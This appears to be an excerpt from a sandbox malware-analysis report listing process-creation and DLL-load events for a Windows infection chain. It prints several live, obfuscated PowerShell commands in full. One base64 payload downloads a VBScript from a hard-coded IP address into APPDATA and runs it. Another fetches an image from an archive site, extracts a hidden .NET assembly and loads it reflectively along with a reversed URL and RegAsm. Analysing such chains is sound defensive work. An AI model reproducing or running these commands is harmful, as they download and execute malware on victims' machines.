ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES15CB.tmp" "c:\Users\user\AppData\Local\Temp\0rfajt3l\CSC378EC5CD3A3F432FA3C6C9642D503F33.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)\| invoke-expresSIon"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES15CB.tmp" "c:\Users\user\AppData\Local\Temp\0rfajt3l\CSC378EC5CD3A3F432FA3C6C9642D503F33.TMP"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)\| invoke-expresSIon"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
